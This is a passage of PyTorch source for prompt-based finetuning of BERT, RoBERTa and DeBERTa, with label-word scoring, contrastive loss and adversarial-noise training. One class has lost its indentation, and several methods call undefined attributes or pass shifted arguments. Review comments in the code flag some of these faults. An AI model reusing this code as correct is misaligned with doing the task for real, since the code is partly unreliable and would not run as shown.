        sequence_mask_output = sequence_output[torch.arange(sequence_output.size(0)), mask_pos]

        # Logits over vocabulary tokens
        prediction_mask_scores = self.cls(sequence_mask_output)

        #sequence_mask_output = self.lm_head.dense(sequence_mask_output)

        # Exit early and only return mask logits.
        if return_full_softmax:
            return prediction_mask_scores

        # Return logits for each label
        logits = []
        for label_id in range(len(self.label_word_list)):
            logits.append(prediction_mask_scores[:, self.label_word_list[label_id]].unsqueeze(-1))
        logits = torch.cat(logits, -1)

        # Regression task
        if self.config.num_labels == 1:
            logsoftmax = nn.LogSoftmax(-1)
            logits = logsoftmax(logits)  # Log prob of right polarity

        if self.model_args.hybrid == 1:
            # NOTE(review): self.classifier is not defined on this class —
            # presumably attached externally; confirm before enabling hybrid.
            cls_logits = self.classifier(sequence_output)
            return (logits, cls_logits), sequence_mask_output

        return logits, sequence_mask_output

    def forward(
            self,
            input_ids=None,
            attention_mask=None,
            token_type_ids=None,
            mask_pos=None,
            labels=None,
            inputs_embeds=None,
            fwd_type=0,
            block_flag=None
    ):
        """Compute loss/logits; ``fwd_type`` 1 returns embeddings, 2 encodes
        from given ``inputs_embeds``, 0 is the normal path."""
        if fwd_type == 2:
            assert inputs_embeds is not None
            return self.encode(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids, mask_pos=mask_pos, inputs_embeds=inputs_embeds)

        elif fwd_type == 1:
            return self.embed_encode(input_ids)

        if self.data_args.continuous_prompt == 1 and block_flag is not None:
            # NOTE(review): generate_continuous_prompt_inputs is not defined
            # on this class (only on the Roberta/LM wrappers) — confirm this
            # path is reachable for BERT.
            inputs_embeds = self.generate_continuous_prompt_inputs(input_ids, block_flag)

        logits, sequence_mask_output = self.encode(input_ids, attention_mask, token_type_ids, mask_pos, inputs_embeds)

        if self.model_args.hybrid == 1:
            # NOTE(review): ``logits`` is reassigned before ``cls_logits`` is
            # read, so cls_logits actually gets logits[0][1] rather than the
            # classifier logits — looks like the two lines are in the wrong
            # order; confirm intended behavior before fixing.
            logits = logits[0]
            cls_logits = logits[1]

        loss = None
        if labels is not None:
            if self.num_labels == 1:
                # Regression task: match a two-point distribution over [lb, ub].
                loss_fct = nn.KLDivLoss(log_target=True)
                labels = torch.stack([1 - (labels.view(-1) - self.lb) / (self.ub - self.lb), (labels.view(-1) - self.lb) / (self.ub - self.lb)], -1)
                loss = loss_fct(logits.view(-1, 2), labels)
            else:
                if labels.shape == logits.shape:
                    # Soft labels: KL between distributions.
                    loss = F.kl_div(F.log_softmax(logits, dim=-1, dtype=torch.float32),
                                    labels, reduction='batchmean')
                else:
                    loss_fct = nn.CrossEntropyLoss()
                    loss = loss_fct(logits.view(-1, logits.size(-1)), labels.view(-1))

        output = (logits,)
        if self.num_labels == 1:
            # Regression output
            output = (torch.exp(logits[..., 1].unsqueeze(-1)) * (self.ub - self.lb) + self.lb,)
        return ((loss,) + output) if loss is not None else output
class RobertaForPromptFinetuning(BertPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
if config.adapter_choice != 'none':
self.roberta = RobertaAdaModel(config)
else:
self.roberta = RobertaModel(config)
# self.classifier = RobertaClassificationHead(config)
self.lm_head = RobertaLMHead(config)
self.hidden_size = config.hidden_size
# self.map = nn.Linear(config.hidden_size, config.hidden_size)
# These attributes should be assigned once the model is initialized
self.model_args = None
self.data_args = None
self.label_word_list = None
self.K = 1
self.step_size=1e-5
self.adv_lc = SymKlCriterion()
self.contra_lc = ContrastiveLoss()
#self.step_size=config.step_size
# For regression
self.lb = None
self.ub = None
self.tokenizer = None
self.prompt_embeddings = None
self.lstm_head = None
self.mlp_head = None
self.mlp = None
# For auto label search.
self.return_full_softmax = None
#self.init_weights()
# else:
# raise ValueError('unknown prompt_encoder_type.')
def get_constrast_loss(self,
input_ids=None,
attention_mask=None,
mask_pos=None,
labels=None,
inputs_embeds=None,
block_flag=None):
self.cos = nn.CosineSimilarity(dim=-1)
if self.data_args.continuous_prompt == 1:
inputs_embeds = self.generate_continuous_prompt_inputs(input_ids, block_flag)
_, sequence_mask_output_1 = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
_, sequence_mask_output_2 = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
sequence_mask_output_1= self.lm_head.dense(sequence_mask_output_1)
sequence_mask_output_2 = self.lm_head.dense(sequence_mask_output_2)
# input_args = [input_ids, attention_mask, mask_pos, labels, None, 1]
# embed = self.forward(*input_args)
#
# vat_args = [input_ids, attention_mask, mask_pos, labels, embed, 2]
#
# adv_logits, outputs = self.forward(*vat_args)
#
# logit_mask = F.softmax(logits, dim=-1)[torch.arange(adv_logits.size(0)), labels] > 0.7
#
# outputs = outputs[logit_mask]
# seq_outputs = sequence_mask_output[logit_mask]
# new_label = labels[logit_mask]
# #
# #
# rand_perm = torch.randperm(outputs.size(0))
# rand_outputs = outputs[rand_perm, :]
# rand_label = new_label[rand_perm]
# pair_label = (new_label == rand_label).long()
#
# seq_outputs = self.map(seq_outputs)
# rand_outputs = self.map(rand_outputs)
pair_labels = (labels.unsqueeze(1) == labels.unsqueeze(0)).float()
contra_loss = self.contra_lc(sequence_mask_output_1.unsqueeze(1), sequence_mask_output_2.unsqueeze(0), pair_labels)
if torch.isnan(contra_loss):
return 0
return contra_loss
def get_adv_loss(self,
input_ids=None,
attention_mask=None,
mask_pos=None,
labels=None,
inputs_embeds=None):
logits, sequence_mask_output = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
input_args = [input_ids, attention_mask, mask_pos, labels, None, 1]
embed = self.forward(*input_args)
noise = generate_noise(embed, attention_mask)
for step in range(0, self.K):
vat_args = [input_ids, attention_mask, mask_pos, labels, embed + noise, 2]
adv_logits, _ = self.forward(*vat_args)
adv_loss = stable_kl(adv_logits, logits.detach(), reduce=False)
try:
delta_grad, = torch.autograd.grad(adv_loss, noise, only_inputs=True, retain_graph=False)
except:
import pdb
pdb.set_trace()
norm = delta_grad.norm()
if (torch.isnan(norm) or torch.isinf(norm)):
return 0
eff_delta_grad = delta_grad * self.step_size
delta_grad, eff_noise = norm_grad(delta_grad, eff_grad=eff_delta_grad)
noise = noise + delta_grad * self.step_size
# noise, eff_noise = self._norm_grad(delta_grad, eff_grad=eff_delta_grad, sentence_level=self.norm_level)
noise = noise.detach()
noise.requires_grad_()
vat_args = [input_ids, attention_mask, mask_pos, labels, embed + noise, 2]
adv_logits, sequence_mask_output = self.forward(*vat_args)
# ori_args = model(*ori_args)
# aug_args = [input_ids, token_type_ids, attention_mask, premise_mask, hyp_mask, task_id, 2, (embed + native_noise).detach()]
adv_loss = self.adv_lc(adv_logits, logits, reduction='none')
return adv_loss
def embed_encode(self, input_ids):
embedding_output = self.roberta.embeddings.word_embeddings(input_ids)
return embedding_output
def encode(self, input_ids=None, attention_mask=None, mask_pos=None, inputs_embeds=None, return_full_softmax=False):
batch_size = input_ids.size(0)
if mask_pos is not None:
mask_pos = mask_pos.squeeze()
# Encode everything
if inputs_embeds is None:
outputs = self.roberta(
input_ids,
attention_mask=attention_mask
)
else:
outputs = self.roberta(
None,
attention_mask=attention_mask,
inputs_embeds=inputs_embeds
)
# Get <mask> token representation
sequence_output, pooled_output = outputs[:2]
sequence_mask_output = sequence_output[torch.arange(sequence_output.size(0)), mask_pos]
# Logits over vocabulary tokens
prediction_mask_scores = self.lm_head(sequence_mask_output)
#sequence_mask_output = self.lm_head.dense(sequence_mask_output)
# Exit early and only return mask logits.
if return_full_softmax:
return prediction_mask_scores
# Return logits for each label
logits = []
for label_id in range(len(self.label_word_list)):
logits.append(prediction_mask_scores[:, self.label_word_list[label_id]].unsqueeze(-1))
logits = torch.cat(logits, -1)
# Regression task
if self.config.num_labels == 1:
logsoftmax = nn.LogSoftmax(-1)
logits = logsoftmax(logits) # Log prob of right polarity
if self.model_args.hybrid == 1:
cls_logits = self.classifier(sequence_output)
return (logits, cls_logits), sequence_mask_output
return logits, sequence_mask_output
def generate_continuous_prompt_inputs(self, input_ids, block_flag):
inputs_embeds = self.embed_encode(input_ids)
bz = inputs_embeds.shape[0]
try:
replace_embeds = self.prompt_embeddings(
torch.LongTensor(list(range(1))).to(inputs_embeds.device))
except:
import pdb
pdb.set_trace()
replace_embeds = self.prompt_embeddings(
torch.LongTensor(list(range(1))))
replace_embeds = replace_embeds.unsqueeze(0) # [batch_size, prompt_length, embed_size]
# if self.model_args.prompt_encoder_type == "lstm":
# replace_embeds = self.lstm_head(replace_embeds)[0] # [batch_size, seq_len, 2 * hidden_dim]
# if self.prompt_length == 1:
# replace_embeds = self.mlp_head(replace_embeds)
# else:
# replace_embeds = self.mlp_head(replace_embeds).squeeze()
# elif self.model_args.prompt_encoder_type == "mlp":
replace_embeds = self.mlp(replace_embeds)
# else:
# raise ValueError("unknown prompt_encoder_type.")
blocked_indices = (block_flag == 1).nonzero(as_tuple=False).reshape((bz, self.model_args.prompt_length, 2))[:, :, 1]
for bidx in range(bz):
for i in range(blocked_indices.shape[1]):
inputs_embeds[bidx, blocked_indices[bidx, i], :] = replace_embeds[i, :]
return inputs_embeds
def forward(
    self,
    input_ids=None,
    attention_mask=None,
    mask_pos=None,
    labels=None,
    inputs_embeds=None,
    fwd_type=0,
    block_flag=None
):
    """Prompt-finetuning forward pass.

    ``fwd_type`` selects the mode:
      2 -- run ``encode`` on the precomputed ``inputs_embeds`` (used by the
           adversarial-training loop); returns ``(logits, mask_repr)``.
      1 -- return only the word embeddings of ``input_ids``.
      0 -- normal path: optionally splice in continuous prompts, encode,
           and compute a loss when ``labels`` is given.

    Returns ``(loss, logits)`` when labels are provided, otherwise
    ``(logits,)``. For regression (``num_labels == 1``) the returned value
    is mapped back to the original ``[lb, ub]`` label range.
    """
    if fwd_type == 2:
        assert inputs_embeds is not None
        return self.encode(input_ids=input_ids, attention_mask=attention_mask,
                           mask_pos=mask_pos, inputs_embeds=inputs_embeds)
    elif fwd_type == 1:
        return self.embed_encode(input_ids)

    if self.data_args.continuous_prompt == 1 and block_flag is not None:
        inputs_embeds = self.generate_continuous_prompt_inputs(input_ids, block_flag)

    logits, sequence_mask_output = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)

    if self.model_args.hybrid == 1:
        # BUG FIX: unpack the (mask_logits, cls_logits) pair *before*
        # rebinding `logits`. The original did `logits = logits[0]` first
        # and then read `cls_logits = logits[1]`, which sliced batch row 1
        # out of the already-unpacked tensor instead of reading the tuple.
        logits, cls_logits = logits[0], logits[1]

    loss = None
    if labels is not None:
        if self.num_labels == 1:
            # Regression: scale labels into [0, 1], treat them as a 2-way
            # (low-polarity, high-polarity) distribution, and match with KL.
            loss_fct = nn.KLDivLoss(log_target=True)
            labels = torch.stack(
                [1 - (labels.view(-1) - self.lb) / (self.ub - self.lb),
                 (labels.view(-1) - self.lb) / (self.ub - self.lb)], -1)
            loss = loss_fct(logits.view(-1, 2), labels)
        else:
            if labels.shape == logits.shape:
                # Soft labels (e.g. distillation): KL divergence.
                loss = F.kl_div(F.log_softmax(logits, dim=-1, dtype=torch.float32),
                                labels, reduction='batchmean')
            else:
                loss_fct = nn.CrossEntropyLoss()
                loss = loss_fct(logits.view(-1, logits.size(-1)), labels.view(-1))

    output = (logits,)
    if self.num_labels == 1:
        # Regression output: map the log-prob of the "high" polarity back
        # to the original label range.
        output = (torch.exp(logits[..., 1].unsqueeze(-1)) * (self.ub - self.lb) + self.lb,)
    return ((loss,) + output) if loss is not None else output
class RobertaForSequenceClassification(BertPreTrainedModel):
    """RoBERTa encoder plus classification head for standard (non-prompt)
    sequence classification, with optional adapter layers selected via
    ``config.adapter_choice``.
    """

    _keys_to_ignore_on_load_missing = [r"position_ids"]

    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        self.config = config
        # Use the adapter-augmented encoder when the config requests it.
        if config.adapter_choice != 'none':
            self.roberta = RobertaAdaModel(config, add_pooling_layer=False)
        else:
            self.roberta = RobertaModel(config, add_pooling_layer=False)
        self.classifier = RobertaClassificationHead(config)
        self.init_weights()

    def freeze_lm_component(self, component):
        """Freeze encoder parameters, keeping only the named component trainable.

        ``component`` is matched by substring: 'attention', 'feedforward'
        (optionally qualified with 'output' / 'intermediate'), 'adapter',
        'embedding', 'bias', or 'head' (freezes everything). Parameters
        matching the component are skipped (left trainable) via
        ``continue``; everything else gets ``requires_grad = False``.
        The classification head is always re-enabled at the end.
        """
        if 'attention' in component:
            for name, param in self.roberta.named_parameters():
                if 'attention' in name:
                    if 'output' in component:
                        # Only the attention *output* sublayer stays trainable.
                        if 'output' in name:
                            continue
                    else:
                        continue
                param.requires_grad = False
        elif 'feedforward' in component:
            for name, param in self.roberta.named_parameters():
                # Feed-forward layers are the dense layers outside attention.
                if 'dense' in name and 'attention' not in name:
                    if 'output' in component:
                        if 'output' in name:
                            continue
                    else:
                        if 'intermediate' in component:
                            if 'intermediate' in name:
                                continue
                param.requires_grad = False
        elif component == 'adapter':
            for name, param in self.roberta.named_parameters():
                if 'adapter' in name:
                    continue
                param.requires_grad = False
        elif 'embedding' in component:
            for name, param in self.roberta.named_parameters():
                if 'embedding' in name:
                    continue
                param.requires_grad = False
        elif 'bias' in component:
            for name, param in self.roberta.named_parameters():
                if 'bias' in name:
                    continue
                param.requires_grad = False
        elif 'head' in component:
            # Freeze the whole encoder; the classification head is restored
            # below.
            for name, param in self.roberta.named_parameters():
                param.requires_grad = False
        self.unfreeze_classification_head()

    def unfreeze_classification_head(self):
        """Re-enable gradients for any LM-head / classifier parameters."""
        for name, param in self.roberta.named_parameters():
            if 'lm_head' in name or ('cls' in name) or ('classifier' in name):
                param.requires_grad = True

    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        position_ids=None,
        head_mask=None,
        inputs_embeds=None,
        labels=None,
        output_attentions=None,
        output_hidden_states=None,
        return_dict=None,
    ):
        r"""
        labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size,)`, `optional`):
            Labels for computing the sequence classification/regression loss. Indices should be in :obj:`[0, ...,
            config.num_labels - 1]`. If :obj:`config.num_labels == 1` a regression loss is computed (Mean-Square loss),
            If :obj:`config.num_labels > 1` a classification loss is computed (Cross-Entropy).
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict

        outputs = self.roberta(
            input_ids,
            attention_mask=attention_mask,
            token_type_ids=token_type_ids,
            position_ids=position_ids,
            head_mask=head_mask,
            inputs_embeds=inputs_embeds,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        sequence_output = outputs[0]
        logits = self.classifier(sequence_output)

        loss = None
        # BUG FIX: the original computed the loss unconditionally, so any
        # inference call without labels crashed on `labels.view(-1)` even
        # though the return statement already guarded on `loss is not None`.
        if labels is not None:
            if self.num_labels == 1:
                # Regression, as promised by the docstring above.
                loss_fct = nn.MSELoss()
                loss = loss_fct(logits.view(-1), labels.view(-1))
            else:
                loss_fct = nn.CrossEntropyLoss()
                loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))

        output = (logits,)
        return ((loss,) + output) if loss is not None else output
class DebertaForPromptFinetuning(DebertaPreTrainedModel):
    """DeBERTa (v1) for prompt-based finetuning.

    Labels are predicted by reading the masked-LM logits at the <mask>
    position and keeping only the scores of the tokens in
    ``label_word_list``. A conventional CLS-style classifier can run in
    parallel ("hybrid" mode).
    """

    _keys_to_ignore_on_load_unexpected = [r"pooler"]
    _keys_to_ignore_on_load_missing = [r"position_ids", r"predictions.decoder.bias"]

    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        self.deberta = DebertaModel(config)
        # MLM head used to score label words at the <mask> position.
        self.cls = DebertaOnlyMLMHead(config)
        self.pooler = ContextPooler(config)
        output_dim = self.pooler.output_dim
        self.classifier = torch.nn.Linear(output_dim, self.num_labels)
        drop_out = getattr(config, "cls_dropout", None)
        drop_out = self.config.hidden_dropout_prob if drop_out is None else drop_out
        self.dropout = StableDropout(drop_out)
        # Rebind `classifier` to the full CLS head: pooler -> dropout -> linear.
        classification_list = [self.pooler, self.dropout, self.classifier]
        self.classifier = nn.Sequential(*classification_list)
        self.map = nn.Linear(config.hidden_size, config.hidden_size)
        self.init_weights()

        # These attributes should be assigned once the model is initialized:
        self.model_args = None        # training-time arguments (hybrid flag, ...)
        self.data_args = None         # data arguments (continuous_prompt flag, ...)
        self.label_word_list = None   # vocabulary ids of the label words

        # Adversarial / contrastive training settings.
        self.K = 1                    # number of adversarial refinement steps
        self.step_size = 1e-5
        self.adv_lc = SymKlCriterion()
        self.contra_lc = ContrastiveLoss()

        # For regression: label bounds used to scale targets into [0, 1].
        self.lb = None
        self.ub = None

        # For auto label search.
        self.return_full_softmax = None

    def get_constrast_loss(self,
                           input_ids=None,
                           attention_mask=None,
                           mask_pos=None,
                           labels=None,
                           inputs_embeds=None):
        """Contrastive loss over two stochastic encodings of the same batch.

        Two forward passes give two views of the <mask> representation
        (dropout makes them differ); example pairs count as positive when
        their labels match.

        NOTE(review): this class's ``encode`` takes ``token_type_ids`` as
        its third positional argument, so the positional calls below pass
        ``mask_pos`` into that slot. Also, the MLM head here is
        ``self.cls`` — there is no ``self.lm_head`` — so the
        ``self.lm_head.dense`` calls would raise AttributeError. Both look
        copied from the RoBERTa variant; confirm before using this path.
        """
        self.cos = nn.CosineSimilarity(dim=-1)

        _, sequence_mask_output_1 = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
        _, sequence_mask_output_2 = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)

        sequence_mask_output_1 = self.lm_head.dense(sequence_mask_output_1)
        sequence_mask_output_2 = self.lm_head.dense(sequence_mask_output_2)

        # pair_labels[i, j] == 1 exactly when examples i and j share a label.
        pair_labels = (labels.unsqueeze(1) == labels.unsqueeze(0)).float()

        contra_loss = self.contra_lc(sequence_mask_output_1.unsqueeze(1),
                                     sequence_mask_output_2.unsqueeze(0),
                                     pair_labels)

        # Guard against degenerate batches producing NaN.
        if torch.isnan(contra_loss):
            return 0
        return contra_loss

    def get_adv_loss(self,
                     input_ids=None,
                     attention_mask=None,
                     mask_pos=None,
                     labels=None,
                     inputs_embeds=None):
        """SMART-style virtual adversarial loss.

        Noise added to the input embeddings is refined for ``K`` steps in
        the direction that maximizes the KL between clean and noisy logits;
        the final symmetric KL between the two is returned.

        NOTE(review): this class's ``forward`` takes ``token_type_ids`` as
        its third positional argument, so the positional ``input_args`` /
        ``vat_args`` calls below shift every argument by one slot (e.g.
        ``fwd_type`` never receives 1/2). Looks copied from a class without
        ``token_type_ids`` — confirm before using this path.
        """
        logits, sequence_mask_output = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)

        # fwd_type=1 (intended): fetch raw word embeddings for input_ids.
        input_args = [input_ids, attention_mask, mask_pos, labels, None, 1]
        embed = self.forward(*input_args)

        noise = generate_noise(embed, attention_mask)
        for step in range(0, self.K):
            # fwd_type=2 (intended): re-encode from the perturbed embeddings.
            vat_args = [input_ids, attention_mask, mask_pos, labels, embed + noise, 2]
            adv_logits, _ = self.forward(*vat_args)
            adv_loss = stable_kl(adv_logits, logits.detach(), reduce=False)
            try:
                delta_grad, = torch.autograd.grad(adv_loss, noise, only_inputs=True, retain_graph=False)
            except:
                # NOTE(review): debugging leftover — bare except into pdb.
                import pdb
                pdb.set_trace()
            norm = delta_grad.norm()
            if (torch.isnan(norm) or torch.isinf(norm)):
                # Unstable gradient: skip the adversarial term entirely.
                return 0
            eff_delta_grad = delta_grad * self.step_size
            delta_grad, eff_noise = norm_grad(delta_grad, eff_grad=eff_delta_grad)
            noise = noise + delta_grad * self.step_size
            noise = noise.detach()
            noise.requires_grad_()

        vat_args = [input_ids, attention_mask, mask_pos, labels, embed + noise, 2]
        adv_logits, sequence_mask_output = self.forward(*vat_args)
        adv_loss = self.adv_lc(adv_logits, logits)
        return adv_loss

    def embed_encode(self, input_ids):
        """Return the word-embedding vectors for ``input_ids`` (no encoder pass)."""
        embedding_output = self.deberta.embeddings.word_embeddings(input_ids)
        return embedding_output

    def encode(self, input_ids=None, attention_mask=None, token_type_ids=None, mask_pos=None, inputs_embeds=None,
               return_full_softmax=False):
        """Run the encoder and score the label words at the <mask> position.

        Returns ``(logits, mask_repr)`` — or ``((logits, cls_logits),
        mask_repr)`` in hybrid mode — and the full vocabulary scores when
        ``return_full_softmax`` is set.
        """
        batch_size = input_ids.size(0)

        if mask_pos is not None:
            mask_pos = mask_pos.squeeze()

        # Encode everything
        if inputs_embeds is None:
            outputs = self.deberta(
                input_ids,
                attention_mask=attention_mask,
                token_type_ids=token_type_ids
            )
        else:
            outputs = self.deberta(
                None,
                attention_mask=attention_mask,
                token_type_ids=token_type_ids,
                inputs_embeds=inputs_embeds
            )

        # Get <mask> token representation
        sequence_output = outputs[0]
        sequence_mask_output = sequence_output[torch.arange(sequence_output.size(0)), mask_pos]

        # Logits over vocabulary tokens
        prediction_mask_scores = self.cls(sequence_mask_output)

        # Exit early and only return mask logits.
        if return_full_softmax:
            return prediction_mask_scores

        # Keep only the scores of the label words, one column per label.
        logits = []
        for label_id in range(len(self.label_word_list)):
            logits.append(prediction_mask_scores[:, self.label_word_list[label_id]].unsqueeze(-1))
        logits = torch.cat(logits, -1)

        # Regression task: convert the two label-word scores to log-probs.
        if self.config.num_labels == 1:
            logsoftmax = nn.LogSoftmax(-1)
            logits = logsoftmax(logits)  # Log prob of right polarity

        if self.model_args.hybrid == 1:
            # Hybrid mode additionally returns CLS-head logits.
            cls_logits = self.classifier(sequence_output)
            return (logits, cls_logits), sequence_mask_output

        return logits, sequence_mask_output

    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        token_type_ids=None,
        mask_pos=None,
        labels=None,
        inputs_embeds=None,
        fwd_type=0,
        block_flag=None
    ):
        """Prompt-finetuning forward pass.

        ``fwd_type``: 2 -> encode from precomputed embeddings; 1 -> return
        word embeddings only; 0 -> normal path. Returns ``(loss, logits)``
        when labels are given, else ``(logits,)``.

        NOTE(review): ``generate_continuous_prompt_inputs`` is not defined
        on this class; the continuous-prompt branch relies on it existing
        elsewhere — confirm.
        """
        if fwd_type == 2:
            assert inputs_embeds is not None
            return self.encode(input_ids=input_ids, attention_mask=attention_mask, token_type_ids=token_type_ids,
                               mask_pos=mask_pos, inputs_embeds=inputs_embeds)
        elif fwd_type == 1:
            return self.embed_encode(input_ids)

        if self.data_args.continuous_prompt == 1 and block_flag is not None:
            inputs_embeds = self.generate_continuous_prompt_inputs(input_ids, block_flag)

        logits, sequence_mask_output = self.encode(input_ids, attention_mask, token_type_ids, mask_pos, inputs_embeds)

        if self.model_args.hybrid == 1:
            # NOTE(review): `logits[1]` is read *after* `logits` has been
            # rebound to `logits[0]`, so it slices batch row 1 of the tensor
            # instead of reading the tuple — looks like a bug; confirm
            # before relying on hybrid mode.
            logits = logits[0]
            cls_logits = logits[1]

        loss = None
        if labels is not None:
            if self.num_labels == 1:
                # Regression: scale labels into [0, 1] and compare the
                # two-way (low, high) distribution with KL.
                loss_fct = nn.KLDivLoss(log_target=True)
                labels = torch.stack([1 - (labels.view(-1) - self.lb) / (self.ub - self.lb),
                                      (labels.view(-1) - self.lb) / (self.ub - self.lb)], -1)
                loss = loss_fct(logits.view(-1, 2), labels)
            else:
                if labels.shape == logits.shape:
                    # Soft labels: KL divergence against the given distribution.
                    loss = F.kl_div(F.log_softmax(logits, dim=-1, dtype=torch.float32),
                                    labels, reduction='batchmean')
                else:
                    loss_fct = nn.CrossEntropyLoss()
                    loss = loss_fct(logits.view(-1, logits.size(-1)), labels.view(-1))

        output = (logits,)
        if self.num_labels == 1:
            # Regression output: map log-prob of the "high" polarity back
            # to the original [lb, ub] range.
            output = (torch.exp(logits[..., 1].unsqueeze(-1)) * (self.ub - self.lb) + self.lb,)
        return ((loss,) + output) if loss is not None else output
class Debertav2ForPromptFinetuning(DebertaV2PreTrainedModel):
    """DeBERTa-v2 for prompt-based finetuning.

    Labels are predicted by reading the masked-LM logits at the <mask>
    position and keeping only the scores of the tokens in
    ``label_word_list``.
    """

    _keys_to_ignore_on_load_unexpected = [r"pooler"]
    _keys_to_ignore_on_load_missing = [r"position_ids", r"predictions.decoder.bias"]

    def __init__(self, config):
        super().__init__(config)
        self.num_labels = config.num_labels
        self.deberta = DebertaV2Model(config)
        # MLM head used to score label words at the <mask> position.
        self.cls = DebertaV2OnlyMLMHead(config)
        self.pooler = ContextPooler(config)
        output_dim = self.pooler.output_dim
        self.classifier = torch.nn.Linear(output_dim, self.num_labels)
        drop_out = getattr(config, "cls_dropout", None)
        drop_out = self.config.hidden_dropout_prob if drop_out is None else drop_out
        self.dropout = StableDropout(drop_out)
        # Rebind `classifier` to the full CLS head: pooler -> dropout -> linear.
        classification_list = [self.pooler, self.dropout, self.classifier]
        self.classifier = nn.Sequential(*classification_list)
        self.map = nn.Linear(config.hidden_size, config.hidden_size)
        self.init_weights()

        # These attributes should be assigned once the model is initialized:
        self.model_args = None        # training-time arguments (hybrid flag, ...)
        self.data_args = None         # data arguments
        self.label_word_list = None   # vocabulary ids of the label words

        # Adversarial / contrastive training settings.
        self.K = 1                    # number of adversarial refinement steps
        self.step_size = 1e-5
        self.adv_lc = SymKlCriterion()
        self.contra_lc = ContrastiveLoss()

        # For regression: label bounds used to scale targets into [0, 1].
        self.lb = None
        self.ub = None

        # For auto label search.
        self.return_full_softmax = None

    def get_constrast_loss(self,
                           input_ids=None,
                           attention_mask=None,
                           mask_pos=None,
                           labels=None,
                           inputs_embeds=None):
        """Contrastive loss over two stochastic encodings of the same batch.

        Two forward passes give two views of the <mask> representation
        (dropout makes them differ); example pairs count as positive when
        their labels match.

        NOTE(review): the MLM head here is ``self.cls`` — this class has no
        ``self.lm_head`` — so the ``self.lm_head.dense`` calls below would
        raise AttributeError. Looks copied from the RoBERTa variant;
        confirm before using this path.
        """
        self.cos = nn.CosineSimilarity(dim=-1)

        _, sequence_mask_output_1 = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)
        _, sequence_mask_output_2 = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)

        sequence_mask_output_1 = self.lm_head.dense(sequence_mask_output_1)
        sequence_mask_output_2 = self.lm_head.dense(sequence_mask_output_2)

        # pair_labels[i, j] == 1 exactly when examples i and j share a label.
        pair_labels = (labels.unsqueeze(1) == labels.unsqueeze(0)).float()

        contra_loss = self.contra_lc(sequence_mask_output_1.unsqueeze(1),
                                     sequence_mask_output_2.unsqueeze(0),
                                     pair_labels)

        # Guard against degenerate batches producing NaN.
        if torch.isnan(contra_loss):
            return 0
        return contra_loss

    def get_adv_loss(self,
                     input_ids=None,
                     attention_mask=None,
                     mask_pos=None,
                     labels=None,
                     inputs_embeds=None):
        """SMART-style virtual adversarial loss.

        Noise added to the input embeddings is refined for ``K`` steps in
        the direction that maximizes the KL between clean and noisy logits;
        the final symmetric KL between the two is returned.
        """
        logits, sequence_mask_output = self.encode(input_ids, attention_mask, mask_pos, inputs_embeds)

        # fwd_type=1: fetch raw word embeddings for input_ids.
        input_args = [input_ids, attention_mask, mask_pos, labels, None, 1]
        embed = self.forward(*input_args)

        noise = generate_noise(embed, attention_mask)
        for step in range(0, self.K):
            # fwd_type=2: re-encode from the perturbed embeddings.
            vat_args = [input_ids, attention_mask, mask_pos, labels, embed + noise, 2]
            adv_logits, _ = self.forward(*vat_args)
            adv_loss = stable_kl(adv_logits, logits.detach(), reduce=False)
            try:
                delta_grad, = torch.autograd.grad(adv_loss, noise, only_inputs=True, retain_graph=False)
            except:
                # NOTE(review): debugging leftover — bare except into pdb.
                import pdb
                pdb.set_trace()
            norm = delta_grad.norm()
            if (torch.isnan(norm) or torch.isinf(norm)):
                # Unstable gradient: skip the adversarial term entirely.
                return 0
            eff_delta_grad = delta_grad * self.step_size
            delta_grad, eff_noise = norm_grad(delta_grad, eff_grad=eff_delta_grad)
            noise = noise + delta_grad * self.step_size
            noise = noise.detach()
            noise.requires_grad_()

        vat_args = [input_ids, attention_mask, mask_pos, labels, embed + noise, 2]
        adv_logits, sequence_mask_output = self.forward(*vat_args)
        adv_loss = self.adv_lc(adv_logits, logits)
        return adv_loss

    def embed_encode(self, input_ids):
        """Return the word-embedding vectors for ``input_ids`` (no encoder pass)."""
        embedding_output = self.deberta.embeddings.word_embeddings(input_ids)
        return embedding_output

    def encode(self, input_ids=None, attention_mask=None, mask_pos=None, inputs_embeds=None, return_full_softmax=False):
        """Run the encoder and score the label words at the <mask> position.

        Returns ``(logits, mask_repr)``, or the full vocabulary scores when
        ``return_full_softmax`` is set. Unlike the v1 class, there is no
        hybrid branch here.
        """
        batch_size = input_ids.size(0)

        if mask_pos is not None:
            mask_pos = mask_pos.squeeze()

        # Encode everything
        if inputs_embeds is None:
            outputs = self.deberta(
                input_ids,
                attention_mask=attention_mask
            )
        else:
            outputs = self.deberta(
                None,
                attention_mask=attention_mask,
                inputs_embeds=inputs_embeds
            )

        # Get <mask> token representation
        sequence_output = outputs[0]
        sequence_mask_output = sequence_output[torch.arange(sequence_output.size(0)), mask_pos]

        # Logits over vocabulary tokens
        prediction_mask_scores = self.cls(sequence_mask_output)

        # Exit early and only return mask logits.
        if return_full_softmax:
            return prediction_mask_scores

        # Keep only the scores of the label words, one column per label.
        logits = []
        for label_id in range(len(self.label_word_list)):
            logits.append(prediction_mask_scores[:, self.label_word_list[label_id]].unsqueeze(-1))
        logits = torch.cat(logits, -1)

        # Regression task: convert the two label-word scores to log-probs.
        if self.config.num_labels == 1:
            logsoftmax = nn.LogSoftmax(-1)
            logits = logsoftmax(logits)  # Log prob of right polarity

        return logits, sequence_mask_output

    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        mask_pos=None,
        labels=None,
        inputs_embeds=None,
        fwd_type=0,
        block_flag=None
